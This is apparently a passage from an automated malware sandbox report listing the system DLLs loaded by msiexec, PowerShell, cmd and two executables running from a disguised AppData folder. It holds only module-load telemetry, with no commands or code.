Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srclient.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.ui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windowmanagementapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: inputhost.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.ui.immersive.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
